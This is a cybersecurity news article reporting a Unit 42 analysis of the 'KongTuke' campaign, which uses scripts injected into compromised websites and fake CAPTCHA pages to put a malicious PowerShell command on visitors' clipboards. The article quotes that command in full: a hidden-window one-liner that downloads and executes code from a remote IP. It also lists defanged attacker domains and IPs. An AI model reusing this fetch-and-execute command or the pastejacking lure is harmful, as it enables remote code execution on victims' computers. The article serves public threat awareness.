![[The AI Show Episode 142]: ChatGPT’s New Image Generator, Studio Ghibli Craze and Backlash, Gemini 2.5, OpenAI Academy, 4o Updates, Vibe Marketing & xAI Acquires X](https://www.marketingaiinstitute.com/hubfs/ep%20142%20cover.png)
![[FREE EBOOKS] The Kubernetes Bible, The Ultimate Linux Shell Scripting Guide & Four More Best Selling Titles](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![From drop-out to software architect with Jason Lengstorf [Podcast #167]](https://cdn.hashnode.com/res/hashnode/image/upload/v1743796461357/f3d19cd7-e6f5-4d7c-8bfc-eb974bc8da68.png?#)
.png?#)
.jpg?#)
_Christophe_Coat_Alamy.jpg?#)
![Rapidus in Talks With Apple as It Accelerates Toward 2nm Chip Production [Report]](https://www.iclarified.com/images/news/96937/96937/96937-640.jpg)
“Clipboard Hijacking” A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data
A sophisticated new cyberattack chain dubbed “KongTuke” has been uncovered by cybersecurity researchers, targeting unsuspecting internet users through compromised legitimate websites. Detailed in a report by Bradley Duncan of Palo Alto Networks’ Unit 42 team, this attack leverages malicious scripts and fake CAPTCHA pages to hijack victims’ clipboards and potentially install unidentified malware. The findings […] The post “Clipboard Hijacking” A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data appeared first on Cyber Security News.
A sophisticated new cyberattack chain dubbed “KongTuke” has been uncovered by cybersecurity researchers, targeting unsuspecting internet users through compromised legitimate websites.
Detailed in a report by Bradley Duncan of Palo Alto Networks’ Unit 42 team, this attack leverages malicious scripts and fake CAPTCHA pages to hijack victims’ clipboards and potentially install unidentified malware.
The findings were shared on April 4, 2025, with additional insights posted on X by Unit 42 Intel, highlighting the growing threat of this campaign.
The Attack Chain
The KongTuke attack begins with a malicious script injected into legitimate but vulnerable websites. One such example cited in the report is hxxps://lancasternh[.]com/6t7y.js, which redirects users to a secondary script at hxxps://lancasternh[.]com/js.php.
This script collects detailed information about the victim’s device, including IP address, browser type, and referrer data, encoded in base64 format.
From there, users are led to a deceptive “verify you are human” page mimicking a CAPTCHA, a common security feature meant to distinguish humans from bots.
However, this CAPTCHA is a ruse. Instead of verifying identity, the page employs a technique known as “clipboard hijacking” or “pastejacking.” It covertly injects a malicious PowerShell script into the victim’s clipboard, accompanied by instructions urging the user to paste and execute it via a Windows Run window.
The script in question, as detailed by Duncan, is:
powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"This command connects to a remote server at 138.199.156[.]22:8080, retrieving additional malicious payloads based on a timestamp calculation.
Traffic and Post-Infection Activity
According to the Unit 42 report, Once executed, the script initiates a series of network requests. Initial traffic includes GET and POST requests to the same IP address, followed by connections to domains such as ecduutcykpvkbim[.]top and bfidmcjejlilflg[.]top.
These domains, hosted at 185.250.151[.]155:80, appear to serve as staging points for further infection. Post-infection, the compromised system establishes command-and-control (C2) communication with 8qvihxy8x5nyixj[.]top over TLSv1.0 HTTPS traffic via 173.232.146[.]62:25658.
Interestingly, the infected host also performs an IP address check using services like api.ipify[.]org and ipinfo[.]io, gathering geolocation data such as city, region, and country. While this step is not inherently malicious, it suggests the attackers are profiling their victims for targeted exploitation.
A Familiar Yet Elusive Threat
The KongTuke campaign has been tracked by cybersecurity communities, including @monitorsg on Mastodon and ThreatFox, under the hashtag #KongTuke.
Duncan notes that the post-infection traffic bears similarities to patterns observed with AsyncRAT, a well-known remote access trojan.
However, the final malware payload remains unidentified, as researchers have yet to obtain a sample for analysis. This uncertainty underscores the evolving nature of the threat and the challenges in combating it.
Unit 42 Intel took to X on April 4, 2025, to alert the public, stating: “Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking).
These pages ask users to paste malicious script into a Run window.” The post, accessible at https://x.com/Unit42_Intel/status/1908253830166323637, included a link to further details and a visual of the fake CAPTCHA page, emphasizing the urgency of awareness.
Bradley Duncan, the author of the report, highlighted the insidious nature of this attack in his notes: “This process is sometimes called ‘clipboard hijacking’ or ‘pastejacking,’ tricking users into executing harmful code under the guise of a routine verification.”
The use of compromised legitimate websites adds a layer of trust that makes the attack particularly dangerous.
Cybersecurity experts urge users to exercise caution when encountering CAPTCHA prompts, especially those requesting manual script execution.
Legitimate CAPTCHAs typically involve simple tasks like image selection, not copying and pasting code.
Users should also keep their systems updated, avoid clicking suspicious links, and employ robust antivirus software to detect and block such threats.
As the KongTuke campaign continues to evolve, researchers at Unit 42 and beyond are working to identify the final malware and disrupt the attack infrastructure. For now, vigilance remains the best defense against this cunning exploitation of trust in everyday web interactions.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates
The post “Clipboard Hijacking” A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data appeared first on Cyber Security News.
.webp?#)
